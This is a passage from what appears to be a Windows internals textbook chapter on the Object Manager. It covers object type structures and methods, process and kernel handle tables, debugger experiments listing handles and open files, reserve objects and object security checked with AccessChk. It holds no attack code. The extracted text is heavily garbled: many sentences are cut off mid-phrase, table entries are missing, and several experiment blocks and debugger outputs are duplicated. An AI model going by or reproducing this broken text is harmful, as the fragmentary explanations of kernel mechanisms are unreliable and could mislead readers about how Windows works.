type (read, write, terminate, suspend, and so on).
Generic access rights mapping
A mapping between the four generic access rights (read, write, execute, and all) to the
[+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x1 [Type: unsigned char]
[+0x002 ( 7: 7)] CacheAligned : 0x1 [Type: unsigned char]
[+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
[+0x003 ( 7: 1)] Reserved
: 0x0 [Type: unsigned char]
[+0x004] ObjectTypeCode : 0x20 [Type: unsigned long]
[+0x008] InvalidAttributes : 0xb0 [Type: unsigned long]
[+0x00c] GenericMapping [Type: _GENERIC_MAPPING]
[+0x01c] ValidAccessMask : 0x1fffff [Type: unsigned long]
[+0x020] RetainAccess : 0x101000 [Type: unsigned long]
[+0x024] PoolType
: NonPagedPoolNx (512) [Type: _POOL_TYPE]
[+0x028] DefaultPagedPoolCharge : 0x1000 [Type: unsigned long]
[+0x02c] DefaultNonPagedPoolCharge : 0x8d8 [Type: unsigned long]
[+0x030] DumpProcedure : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
[+0x038] OpenProcedure : 0xfffff8047f062f40 [Type: long (__cdecl*)
(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
[+0x040] CloseProcedure : 0xfffff8047F087a90 [Type: void (__cdecl*)
(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
[+0x048] DeleteProcedure : 0xfffff8047f02f030 [Type: void (__cdecl*)(void *)]
[+0x050] ParseProcedure : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,void * *)]
[+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,
char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
[+0x058] SecurityProcedure : 0xfffff8047eff57b0 [Type: long (__cdecl*)
(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,
void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
[+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_
OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
[+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,
void *,void *,char)]
[+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
[+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
[+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]
140
CHAPTER 8 System mechanisms
Attribute
Purpose
Retain access
Access rights that can never be removed by any third-party Object Manager callbacks
(part of the callback list described earlier).
Indicate whether objects must never have names (such as process objects), whether
their names are case-sensitive, whether they require a security descriptor, whether
they should be cache aligned (requiring a padding subheader), whether they sup-
subheader) and/or a type-list linkage (creator information subheader) should be
maintained. The use default objectdefault object
use extended parameters
of the extended parse procedure method, described later.
Object type code
Used to describe the type of object this is (versus comparing with a well-known name
1, synchronization objects set this to 2, and thread ob-
jects set this to 4
associated with a message.
Invalid attributes
object type.
Default object
object, if the object type creator requested one. Note that certain objects, such as
Allows the Object Manager to generically locate the underlying kernel dispatcher
object that should be used for synchronization when one of the generic wait services
shown earlier (WaitForSingleObject, etc.) is called on the object.
Methods
One or more routines that the Object Manager calls automatically at certain points in
Synchronization
to synchronize its execution by waiting for an object to change from one state to another. A thread can
-
ity to support synchronization is based on three possibilities:
I
The executive object is a wrapper for a dispatcher object and contains a dispatcher header, a
kernel structure that is covered in the section “Low-IRQL synchronization” later in this chapter.
I
The creator of the object type requested a default object, and the Object Manager provided one.
I
The executive object has an embedded dispatcher object, such as an event somewhere inside
when registering the object type (described in Table 8-14).
Object methods
The last attribute in Table 8-22, methods, comprises a set of internal routines that are similar to C++
constructors and destructors—that is, routines that are automatically called when an object is created
or destroyed. The Object Manager extends this idea by calling an object method in other situations
as well, such as when someone opens or closes a handle to an object or when someone attempts to
-
pending on how the object type is to be used.
CHAPTER 8 System mechanisms
141
When an executive component creates a new object type, it can register one or more methods with
The methods that the Object Manager supports are listed in Table 8-23.
TABLE 8-23 Object methods
Method
When Method Is Called
Open
When an object handle is created, opened, duplicated, or inherited
Close
When an object handle is closed
Delete
Before the Object Manager deletes an object
Query name
When a thread requests the name of an object
Parse
When the Object Manager is searching for an object name
Dump
Not used
Okay to close
When the Object Manager is instructed to close a handle
Security
object namespace
-
-
tines would have required the designers of the Object Manager to anticipate all object types. Not only
would this add extreme complexity to the kernel, but the routines to create an object type are actually
exported by the kernel! Because this enables external kernel components to create their own object
types, the kernel would be unable to anticipate potential custom behaviors. Although this functional-
ity is not documented for driver developers, it is internally used by Pcw.sys, Dxgkrnl.sys, Win32k.sys,
ConnectionPort, NdisCmState, and other objects. Through object-method extensibility, these drivers
Another reason for these methods is simply to allow a sort of virtual constructor and destructor
additional actions during handle creation and closure, as well as during object destruction. They even
allow prohibiting handle closure and creation, when such actions are undesired—for example, the pro-
tected process mechanism described in Part 1, Chapter 3, leverages a custom handle creation method
to prevent less protected processes from opening handles to more protected ones. These methods
also provide visibility into internal Object Manager APIs such as duplication and inheritance, which are
delivered through generic services.
be used to implement a secondary namespace outside of the purview of the Object Manager. In
-
these methods.
142
CHAPTER 8 System mechanisms
The Object Manager only calls routines if their pointer is not set to NULL in the type initializer—with
one exception: the security routine, which defaults to SeDefaultObjectMethod. This routine does not
need to know the internal structure of the object because it deals only with the security descriptor for the
not inside the object body. However, if an object does require its own additional security checks, it can
The Object Manager calls the open method whenever it creates a handle to an object, which it does
Desktop objects provide an open method. Indeed, the WindowStation object type requires an open
method so that Win32k.sys can share a piece of memory with the process that serves as a desktop-
related memory pool.
An example of the use of a close method occurs in the I/O system. The I/O manager registers a close
Object Manager itself can or should do.
The Object Manager calls a delete method, if one is registered, before it deletes a temporary object
from memory. The memory manager, for example, registers a delete method for the section object
-
tures the memory manager has allocated for a section are deleted before the section object is deleted.
-
ings of the memory manager. Delete methods for other types of objects perform similar functions.
The parse method (and similarly, the query name method) allows the Object Manager to relinquish
Object Manager namespace. When the Object Manager looks up an object name, it suspends its search
when it encounters an object in the path that has an associated parse method. The Object Manager
calls the parse method, passing to it the remainder of the object name it is looking for. There are two
-
resume.doc, the Object Manager traverses its name tree until it reaches the device object named
HarddiskVolume1. It sees that a parse method is associated with this object, and it calls the method,
passing to it the rest of the object name it was searching for—in this case, the string docs\resume.doc.
CHAPTER 8 System mechanisms
143
The security method, which the I/O system also uses, is similar to the parse method. It is called
change it.
-
has a handle to the Desktop object or objects on which its thread or threads have windows visible.
Under the standard security model, it is possible for those threads to close their handles to their desk-
tops because the process has full control of its own objects. In this scenario, the threads end up without
a desktop associated with them—a violation of the windowing model. Win32k.sys registers an okay-to-
close routine for the Desktop and WindowStation objects to prevent this behavior.
Object handles and the process handle table
When a process creates or opens an object by name, it receives a handle that represents its access
to the object. Referring to an object by its handle is faster than using its name because the Object
can also acquire handles to objects by inheriting handles at process creation time (if the creator speci-
CreateProcess call and the handle was marked as inheritable, either
at the time it was created or afterward by using the Windows SetHandleInformation function) or by
receiving a duplicated handle from another process. (See the Windows DuplicateHandle function.)
All user-mode processes must own a handle to an object before their threads can use the object.
-
face to reference objects, regardless of their type. Second, the Object Manager has the exclusive right
to create handles and to locate an object that a handle refers to. This means that the Object Manager
caller allows the operation requested on the object in question.
144
CHAPTER 8 System mechanisms
Note Executive components and device drivers can access objects directly because they
are running in kernel mode and therefore have access to the object structures in system
memory. However, they must declare their usage of the object by incrementing the refer-
-
tion “Object retention” later in this chapter for more details.) To successfully make use of
object, and this is not provided for most objects. Instead, device drivers are encouraged to
although device drivers can get a pointer to the Process object (EPROCESS), the structure is
opaque, and the Ps*
(such as most executive objects that wrap a dispatcher object—for example, events or mu-
end up calling (such as ZwCreateEvent) and use handles instead of object pointers.
EXPERIMENT: Viewing open handles
handles. (Click on View, Lower Pane View, and then Handles.) Then open a command prompt
Explorer shows the following:
Now pause Process Explorer by pressing the spacebar or selecting View, Update Speed
and choosing Pause. Then change the current directory with the cd command and press F5 to
refresh the display. You will see in Process Explorer that the handle to the previous current direc-
tory is closed, and a new handle is opened to the new current directory. The previous handle is
highlighted in red, and the new handle is highlighted in green.
EXPERIMENT: Viewing open handles
handles. (Click on View, Lower Pane View, and then Handles.) Then open a command prompt
Explorer shows the following:
Now pause Process Explorer by pressing the spacebar or selecting View, Update Speed
and choosing Pause. Then change the current directory with the cd command and press F5 to
refresh the display. You will see in Process Explorer that the handle to the previous current direc-
tory is closed, and a new handle is opened to the new current directory. The previous handle is
highlighted in red, and the new handle is highlighted in green.
CHAPTER 8 System mechanisms
145
can quickly show what handle or handles are being opened but not closed. (Typically, you see
handle leak.
Resource Monitor also shows open handles to named handles for the processes you select by
You can also display the open handle table by using the command-line Handle tool from
object handles located in the handle table for a Cmd.exe process before and after changing
–a switch is used, which
displays all the handles in the process, similar to Process Explorer.
C:\Users\aione>\sysint\handle.exe -p 8768 -a users
Nthandle v4.22 - Handle viewer
Copyright (C) 1997-2019 Mark Russinovich
Sysinternals - www.sysinternals.com
cmd.exe
pid: 8768 type: File
150: C:\Users\Public
can quickly show what handle or handles are being opened but not closed. (Typically, you see
handle leak.
Resource Monitor also shows open handles to named handles for the processes you select by
You can also display the open handle table by using the command-line Handle tool from
object handles located in the handle table for a Cmd.exe process before and after changing
–a switch is used, which
displays all the handles in the process, similar to Process Explorer.
C:\Users\aione>\sysint\handle.exe -p 8768 -a users
Nthandle v4.22 - Handle viewer
Copyright (C) 1997-2019 Mark Russinovich
Sysinternals - www.sysinternals.com
cmd.exe
pid: 8768 type: File
150: C:\Users\Public
146
CHAPTER 8 System mechanisms
An object handlehandle table, pointed to by the executive process
(EPROCESS) block (described in Chapter 3 of Part 1). The index is multiplied by 4 (shifted 2 bits) to make
is 4, the second 8, and so on. Using handle 5, 6, or 7 simply redirects to the same object as handle 4,
while 9, 10, and 11 would reference the same object as handle 8.
a handle to, and handle values are aggressively reused, such that the next new handle index will reuse
a three-level scheme, similar to the way that the legacy x86 memory management unit implemented
virtual-to-physical address translation but with a cap of 24 bits for compatibility reasons, resulting in a
-
try layout on Windows. To save on kernel memory costs, only the lowest-level handle table is allocated
on process creation—the other levels are created as needed. The subhandle table consists of as many
-
tems, a page is 4096 bytes, divided by the size of a handle table entry (16 bytes), which is 256, minus 1,
which is a total of 255 entries in the lowest-level handle table. The mid-level handle table contains a full
page of pointers to subhandle tables, so the number of subhandle tables depends on the size of the
page and the size of a pointer for the platform. Again using 64-bit systems as an example, this gives
us 4096/8, or 512 entries. Due to the cap of 24 bits, only 32 entries are allowed in the top-level pointer
Process
Handle
table
Top-level
pointers
Middle-level
pointers
Subhandle
table
FIGURE 8-33 Windows process handle table architecture.
CHAPTER 8 System mechanisms
147
EXPERIMENT: Creating the maximum number of handles
The test program Testlimit from Sysinternals has an option to open handles to an object until it
cannot open any more handles. You can use this to see how many handles can be created in a
single process on your system. Because handle tables are allocated from paged pool, you might
run out of paged pool before you hit the maximum number of handles that can be created in a
single process. To see how many handles you can create on your system, follow these steps:
1.
need from https://docs.microsoft.com/en-us/sysinternals/downloads/testlimit.
2.
Run Process Explorer, click View, and then click System Information. Then click the
Memory tab. Notice the current and maximum size of paged pool. (To display the
symbols for the kernel image, Ntoskrnl.exe.) Leave this system information display run-
ning so that you can see pool utilization when you run the Testlimit program.
3.
Open a command prompt.
4.
Run the Testlimit program with the –h switch (do this by typing testlimit –h). When
Testlimit fails to open a new handle, it displays the total number of handles it was able
to create. If the number is less than approximately 16 million, you are probably running
out of paged pool before hitting the theoretical per-process handle limit.
5.
Close the Command Prompt window; doing this kills the Testlimit process, thus closing
all the open handles.
objects are 8-byte aligned, and these bits can be assumed to be 0), and the granted access mask (out of
which only 25 bits are needed, since generic rights are never stored in the handle entry) combined with
reference usage count, which we describe shortly.
Pointer to object header
Access mask
32 bits
Audit on close
Inheritable
Lock
A I
L
No Rights Upgrade
Protect from close
U P Usage Count
FIGURE 8-34 Structure of a 32-bit handle table entry.
EXPERIMENT: Creating the maximum number of handles
The test program Testlimit from Sysinternals has an option to open handles to an object until it
cannot open any more handles. You can use this to see how many handles can be created in a
single process on your system. Because handle tables are allocated from paged pool, you might
run out of paged pool before you hit the maximum number of handles that can be created in a
single process. To see how many handles you can create on your system, follow these steps:
1.
need from https://docs.microsoft.com/en-us/sysinternals/downloads/testlimit.
2.
Run Process Explorer, click View, and then click System Information. Then click the
Memory tab. Notice the current and maximum size of paged pool. (To display the
Memory tab. Notice the current and maximum size of paged pool. (To display the
Memory
symbols for the kernel image, Ntoskrnl.exe.) Leave this system information display run-
ning so that you can see pool utilization when you run the Testlimit program.
3.
Open a command prompt.
4.
Run the Testlimit program with the –h switch (do this by typing testlimit –h). When
Testlimit fails to open a new handle, it displays the total number of handles it was able
to create. If the number is less than approximately 16 million, you are probably running
out of paged pool before hitting the theoretical per-process handle limit.
5.
Close the Command Prompt window; doing this kills the Testlimit process, thus closing
all the open handles.
148
CHAPTER 8 System mechanisms
-
ple, 44 bits are now needed to encode the object pointer (assuming a processor with four-level paging
and 48-bits of virtual memory), since objects are 16-byte aligned, and thus the bottom four bits can
that the reference usage count is encoded in the remaining 16 bits next to the pointer, instead of next to
-
ing 6 bits are spare, and there are still 32-bits of alignment that are also currently spare, for a total of 16
must now be 53 bits, reducing the usage count bits to only 7.
should expect the bottom bit to normally be set
is, it indicates whether processes created by this process will get a copy of this handle in their handle
SetHandleInformation
be set with the SetHandleInformation
access rights should be upgraded if the handle is duplicated to a process with higher privileges.
OBJECT_HANDLE_INFORMATION structure
that is passed in to APIs such as ObReferenceObjectByHandle, and map to OBJ_INHERIT (0x2), OBJ_
AUDIT_OBJECT_CLOSE (0x4), OBJ_PROTECT_CLOSE (0x1), and OBJ_NO_RIGHTS_UPGRADE (0x8), which
reference usage count in both the encoding of the pointer
cached number (based on the number of available bits) of preexisting references as part of each handle
entry and then adds up the usage counts of all processes that have a handle to the object into the
-
ences through ObReferenceObject, and the number of cached references for each handle.
-
ing any Windows API that takes a handle as input and ends up converting it into an object—the cached
number of references is dropped, which is to say that the usage count decreases by 1, until it reaches
0, at which point it is no longer tracked. This allows one to infer exactly the number of times a given
The debugger command !trueref, when executed with the -v
each handle referencing an object and exactly how many times it was used (if you count the number
CHAPTER 8 System mechanisms
149
System components and device drivers often need to open handles to objects that user-mode
with. This is done by creating handles in the kernel handle table (referenced internally with the name
ObpKernelHandleTable), which is associated with the System process. The handles in this table are ac-
cessible only from kernel mode and in any process context. This means that a kernel-mode function
can reference the handle in any process context with no performance impact.
The Object Manager recognizes references to handles from the kernel handle table when the high
bit of the handle is set—that is, when references to kernel-handle-table handles have values greater
The kernel handle table also serves as the handle table for the System and minimal processes, and as
such, all handles created by the System process (such as code running in system threads) are implicitly ker-
nel handles because the ObpKernelHandleTable symbol is set the as ObjectTable of the EPROCESS structure
the DuplicateHandle API to extract a kernel handle out into user mode, but this attack has been mitigated
since Windows Vista with the introduction of protected processes, which were described in Part 1.
any handle created by a kernel driver, with the previous mode
-
vent handles from inadvertently leaking to user space applications.
EXPERIMENT: Viewing the handle table with the kernel debugger
The !handle command in the kernel debugger takes three arguments:
!handle <handle index> <flags> <processid>
!handle 4
handle entry,” bit 1 means “display free handles (not just used handles),” and bit 2 means “display
information about the object that the handle refers to.” The following command displays full
details about the handle table for process ID 0x1540:
lkd> !handle 0 7 1540
PROCESS ffff898f239ac440
SessionId: 0 Cid: 1540 Peb: 1ae33d000 ParentCid: 03c0
DirBase: 211e1d000 ObjectTable: ffffc704b46dbd40 HandleCount: 641.
Image: com.docker.service
Handle table at ffffc704b46dbd40 with 641 entries in use
0004: Object: ffff898f239589e0 GrantedAccess: 001f0003 (Protected) (Inherit) Entry:
ffffc704b45ff010
EXPERIMENT: Viewing the handle table with the kernel debugger
The !handle command in the kernel debugger takes three arguments:
!handle <handle index> <flags> <processid>
!handle 4
handle entry,” bit 1 means “display free handles (not just used handles),” and bit 2 means “display
information about the object that the handle refers to.” The following command displays full
details about the handle table for process ID 0x1540:
lkd> !handle 0 7 1540
PROCESS ffff898f239ac440
SessionId: 0 Cid: 1540 Peb: 1ae33d000 ParentCid: 03c0
DirBase: 211e1d000 ObjectTable: ffffc704b46dbd40 HandleCount: 641.
Image: com.docker.service
Handle table at ffffc704b46dbd40 with 641 entries in use
0004: Object: ffff898f239589e0 GrantedAccess: 001f0003 (Protected) (Inherit) Entry:
ffffc704b45ff010
150
CHAPTER 8 System mechanisms
Object: ffff898f239589e0 Type: (ffff898f032e2560) Event
ObjectHeader: ffff898f239589b0 (new version)
HandleCount: 1 PointerCount: 32766
0008: Object: ffff898f23869770 GrantedAccess: 00000804 (Audit) Entry: ffffc704b45ff020
Object: ffff898f23869770 Type: (ffff898f033f7220) EtwRegistration
ObjectHeader: ffff898f23869740 (new version)
HandleCount: 1 PointerCount: 32764
Instead of having to remember what all these bits mean, and convert process IDs to hexa-
decimal, you can also use the debugger data model to access handles through the Io.Handles
dx @$curprocess.Io.Handles[4]
handle for the current process, including the access rights and name, while the following com-
mand displays full details about the handles in PID 5440 (that is, 0x1540):
lkd> dx -r2 @$cursession.Processes[5440].Io.Handles
@$cursession.Processes[5440].Io.Handles
[0x4]
Handle
: 0x4
Type
: Event
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch |
QueryState | ModifyState
Object
[Type: _OBJECT_HEADER]
[0x8]
Handle
: 0x8
Type
: EtwRegistration
GrantedAccess
Object
[Type: _OBJECT_HEADER]
[0xc]
Handle
: 0xc
Type
: Event
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch |
QueryState | ModifyState
Object
[Type: _OBJECT_HEADER]
You can use the debugger data model with a LINQ predicate to perform more interesting
searches, such as looking for named section object mappings that are Read/Write:
lkd> dx @$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
@$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
[0x16c]
: "Cor_Private_IPCBlock_v4_5440"
[0x170]
: "Cor_SxSPublic_IPCBlock"
[0x354]
: "windows_shell_global_counters"
[0x3b8]
: "UrlZonesSM_DESKTOP-SVVLOTP$"
[0x680]
: "NLS_CodePage_1252_3_2_0_0"
Object: ffff898f239589e0 Type: (ffff898f032e2560) Event
ObjectHeader: ffff898f239589b0 (new version)
HandleCount: 1 PointerCount: 32766
0008: Object: ffff898f23869770 GrantedAccess: 00000804 (Audit) Entry: ffffc704b45ff020
Object: ffff898f23869770 Type: (ffff898f033f7220) EtwRegistration
ObjectHeader: ffff898f23869740 (new version)
HandleCount: 1 PointerCount: 32764
Instead of having to remember what all these bits mean, and convert process IDs to hexa-
decimal, you can also use the debugger data model to access handles through the Io.Handles
dx @$curprocess.Io.Handles[4]
handle for the current process, including the access rights and name, while the following com-
mand displays full details about the handles in PID 5440 (that is, 0x1540):
lkd> dx -r2 @$cursession.Processes[5440].Io.Handles
@$cursession.Processes[5440].Io.Handles
[0x4]
Handle
: 0x4
Type
: Event
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch |
QueryState | ModifyState
Object
[Type: _OBJECT_HEADER]
[0x8]
Handle
: 0x8
Type
: EtwRegistration
GrantedAccess
Object
[Type: _OBJECT_HEADER]
[0xc]
Handle
: 0xc
Type
: Event
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch |
QueryState | ModifyState
Object
[Type: _OBJECT_HEADER]
You can use the debugger data model with a LINQ predicate to perform more interesting
searches, such as looking for named section object mappings that are Read/Write:
lkd> dx @$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
@$cursession.Processes[5440].Io.Handles.Where(h => (h.Type == "Section") &&
(h.GrantedAccess.MapWrite) && (h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
[0x16c]
: "Cor_Private_IPCBlock_v4_5440"
[0x170]
: "Cor_SxSPublic_IPCBlock"
[0x354]
: "windows_shell_global_counters"
[0x3b8]
: "UrlZonesSM_DESKTOP-SVVLOTP$"
[0x680]
: "NLS_CodePage_1252_3_2_0_0"
CHAPTER 8 System mechanisms
151
EXPERIMENT: Searching for open files with the kernel debugger
a system remotely. You can instead use the !devhandles command to search for handles opened to
1.
Device object. You can use the !object command as shown here:
lkd> !object \Global??\C:
Object: ffffc704ae684970 Type: (ffff898f03295a60) SymbolicLink
ObjectHeader: ffffc704ae684940 (new version)
HandleCount: 0 PointerCount: 1
Directory Object: ffffc704ade04ca0 Name: C:
Flags: 00000000 ( Local )
Target String is '\Device\HarddiskVolume3'
Drive Letter Index is 3 (C:)
2.
Next, use the !object command to get the Device object of the target volume name:
1: kd> !object \Device\HarddiskVolume1
Object: FFFF898F0820D8F0 Type: (fffffa8000ca0750) Device
3.
Now you can use the pointer of the Device object with the !devhandles command.
lkd> !devhandles 0xFFFF898F0820D8F0
Checking handle table for process 0xffff898f0327d300
Kernel handle table at ffffc704ade05580 with 7047 entries in use
PROCESS ffff898f0327d300
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 001ad000 ObjectTable: ffffc704ade05580 HandleCount: 7023.
Image: System
019c: Object: ffff898F080836a0 GrantedAccess: 0012019f (Protected) (Inherit)
(Audit) Entry: ffffc704ade28670
Object: ffff898F080836a0 Type: (ffff898f032f9820) File
ObjectHeader: ffff898F08083670 (new version)
HandleCount: 1 PointerCount: 32767
Directory Object: 00000000 Name: \$Extend\$RmMetadata\$TxfLog\
$TxfLog.blf {HarddiskVolume4}
achieve the same effect with a LINQ predicate, which instantly starts returning results:
lkd> dx -r2 @$cursession.Processes.Select(p => p.Io.Handles.Where(h =>
h.Type == "File").Where(f => f.Object.UnderlyingObject.DeviceObject ==
(nt!_DEVICE_OBJECT*)0xFFFF898F0820D8F0).Select(f =>
f.Object.UnderlyingObject.FileName))
@$cursession.Processes.Select(p => p.Io.Handles.Where(h => h.Type == "File").
EXPERIMENT: Searching for open files with the kernel debugger
a system remotely. You can instead use the !devhandles command to search for handles opened to
1.
Device object. You can use the !object command as shown here:
lkd> !object \Global??\C:
Object: ffffc704ae684970 Type: (ffff898f03295a60) SymbolicLink
ObjectHeader: ffffc704ae684940 (new version)
HandleCount: 0 PointerCount: 1
Directory Object: ffffc704ade04ca0 Name: C:
Flags: 00000000 ( Local )
Target String is '\Device\HarddiskVolume3'
Drive Letter Index is 3 (C:)
2.
Next, use the !object command to get the Device object of the target volume name:
1: kd> !object \Device\HarddiskVolume1
Object: FFFF898F0820D8F0 Type: (fffffa8000ca0750) Device
3.
Now you can use the pointer of the Device object with the !devhandles command.
lkd> !devhandles 0xFFFF898F0820D8F0
Checking handle table for process 0xffff898f0327d300
Kernel handle table at ffffc704ade05580 with 7047 entries in use
PROCESS ffff898f0327d300
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 001ad000 ObjectTable: ffffc704ade05580 HandleCount: 7023.
Image: System
019c: Object: ffff898F080836a0 GrantedAccess: 0012019f (Protected) (Inherit)
(Audit) Entry: ffffc704ade28670
Object: ffff898F080836a0 Type: (ffff898f032f9820) File
ObjectHeader: ffff898F08083670 (new version)
HandleCount: 1 PointerCount: 32767
Directory Object: 00000000 Name: \$Extend\$RmMetadata\$TxfLog\
$TxfLog.blf {HarddiskVolume4}
achieve the same effect with a LINQ predicate, which instantly starts returning results:
lkd> dx -r2 @$cursession.Processes.Select(p => p.Io.Handles.Where(h =>
h.Type == "File").Where(f => f.Object.UnderlyingObject.DeviceObject ==
(nt!_DEVICE_OBJECT*)0xFFFF898F0820D8F0).Select(f =>
f.Object.UnderlyingObject.FileName))
@$cursession.Processes.Select(p => p.Io.Handles.Where(h => h.Type == "File").
152
CHAPTER 8 System mechanisms
Where(f => f.Object.UnderlyingObject.DeviceObject == (nt!_DEVICE_OBJECT*)
0xFFFF898F0820D8F0).Select(f => f.Object.UnderlyingObject.FileName))
[0x0]
[0x19c] : "\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf" [Type: _UNICODE_STRING]
[0x2dc] : "\$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION" [Type: _UNICODE_STRING]
[0x2e0] : "\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002"
[Type: _UNICODE_STRING]
Reserve Objects
-
cations and kernel code to create objects is essential to the normal and desired runtime behavior of any
piece of Windows code. If an object allocation fails, this usually causes anything from loss of functional-
-
tion object). Worse, in certain situations, the reporting of errors that led to object creation failure might
themselves require new objects to be allocated. Windows implements two special reserve objects to
deal with such situations: the User APC reserve object and the I/O Completion packet reserve object.
Note that the reserve-object mechanism is fully extensible, and future versions of Windows might add
other reserve object types—from a broad view, the reserve object is a mechanism enabling any kernel-
mode data structure to be wrapped as an object (with an associated handle, name, and security) for
later use.
As was discussed earlier in this chapter, APCs are used for operations such as suspension, termina-
tion, and I/O completion, as well as communication between user-mode applications that want to
provide asynchronous callbacks. When a user-mode application requests a User APC to be targeted
to another thread, it uses the QueueUserApc NtQueueApcThread
system call. In the kernel, this system call attempts to allocate a piece of paged pool in which to store
the KAPC control object structure associated with an APC. In low-memory situations, this operation
fails, preventing the delivery of the APC, which, depending on what the APC was used for, could cause
loss of data or functionality.
To prevent this, the user-mode application, can, on startup, use the NtAllocateReserveObject system
call to request the kernel to preallocate the KAPC structure. Then the application uses a different sys-
tem call, NtQueueApcThreadEx, that contains an extra parameter that is used to store the handle to the
reserve object. Instead of allocating a new structure, the kernel attempts to acquire the reserve object
(by setting its InUse bit to true
the reserve object is released back to the system. Currently, to prevent mismanagement of system
resources by third-party developers, the reserve object API is available only internally through system
guarantee that asynchronous callbacks will still be able to return in low-memory situations.
A similar scenario can occur when applications need failure-free delivery of an I/O completion port
message or packet. Typically, packets are sent with the PostQueuedCompletionStatus
dll, which calls the NtSetIoCompletion API. Like the user APC, the kernel must allocate an I/O manager
structure to contain the completion-packet information, and if this allocation fails, the packet cannot
Where(f => f.Object.UnderlyingObject.DeviceObject == (nt!_DEVICE_OBJECT*)
0xFFFF898F0820D8F0).Select(f => f.Object.UnderlyingObject.FileName))
[0x0]
[0x19c] : "\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf" [Type: _UNICODE_STRING]
[0x2dc] : "\$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION" [Type: _UNICODE_STRING]
[0x2e0] : "\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000002"
[Type: _UNICODE_STRING]
CHAPTER 8 System mechanisms
153
be created. With reserve objects, the application can use the NtAllocateReserveObject API on startup
to have the kernel preallocate the I/O completion packet, and the NtSetIoCompletionEx system call
APC reserve objects, this functionality is reserved for system components and is used both by the RPC
library and the Windows Peer-To-Peer BranchCache service to guarantee completion of asynchronous
I/O operations.
Object security
object or opens a handle to an existing object, the process must specify a set of desired access rights—
that is, what it wants to do with the object. It can request either a set of standard access rights (such as
Similarly, it might require the ability to suspend or terminate a thread object.
When a process opens a handle to an object, the Object Manager calls the security reference moni-
tor
access the process is requesting. If it does, the reference monitor returns a set of granted access rights
that the process is allowed, and the Object Manager stores them in the object handle it creates. How
the security system determines who gets access to which objects is explored in Chapter 7 of Part 1.
Manager can quickly check whether the set of granted access rights stored in the handle corresponds
read access to a section object but then calls a service to write to it, the service fails.
EXPERIMENT: Looking at object security
You can look at the various permissions on an object by using either Process Hacker, Process
Explorer, WinObj, WinObjEx64, or AccessChk, which are all tools from Sysinternals or open-
list (ACL) for an object:
I
You can use WinObj or WinObjEx64 to navigate to any object on the system, including
object directories, right-click the object, and select Properties
BaseNamedObjects directory, select Properties, and click the Security tab. You should
see a dialog box like the one shown next. Because WinObjEx64 supports a wider variety of
delete access to the directory, for example, but the SYSTEM account does (because this is where
session 0 services with SYSTEM privileges will store their objects).
EXPERIMENT: Looking at object security
You can look at the various permissions on an object by using either Process Hacker, Process
Explorer, WinObj, WinObjEx64, or AccessChk, which are all tools from Sysinternals or open-
list (ACL) for an object:
I
You can use WinObj or WinObjEx64 to navigate to any object on the system, including
object directories, right-click the object, and select Properties
BaseNamedObjects directory, select Properties, and click the Security tab. You should
Security tab. You should
Security
see a dialog box like the one shown next. Because WinObjEx64 supports a wider variety of
delete access to the directory, for example, but the SYSTEM account does (because this is where
session 0 services with SYSTEM privileges will store their objects).
154
CHAPTER 8 System mechanisms
I
Instead of using WinObj or WinObjEx64, you can view the handle table of a process using
Process Explorer, as shown in the experiment “Viewing open handles” earlier in this chapter,
or using Process Hacker, which has a similar view. Look at the handle table for the Explorer.exe
per-session namespace shortly.) You can double-click the object handle and then click the
Security tab and see a similar dialog box (with more users and rights granted).
I
–o switch as shown in the following output. Note that using AccessChk will also show you
the integrity level of the object. (See Chapter 7 of Part 1, for more information on integrity
levels and the security reference monitor.)
C:\sysint>accesschk -o \Sessions\1\BaseNamedObjects
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
\Sessions\1\BaseNamedObjects
Type: Directory
RW Window Manager\DWM-1
RW NT AUTHORITY\SYSTEM
RW DESKTOP-SVVLOTP\aione
RW DESKTOP-SVVLOTP\aione-S-1-5-5-0-841005
RW BUILTIN\Administrators
R Everyone
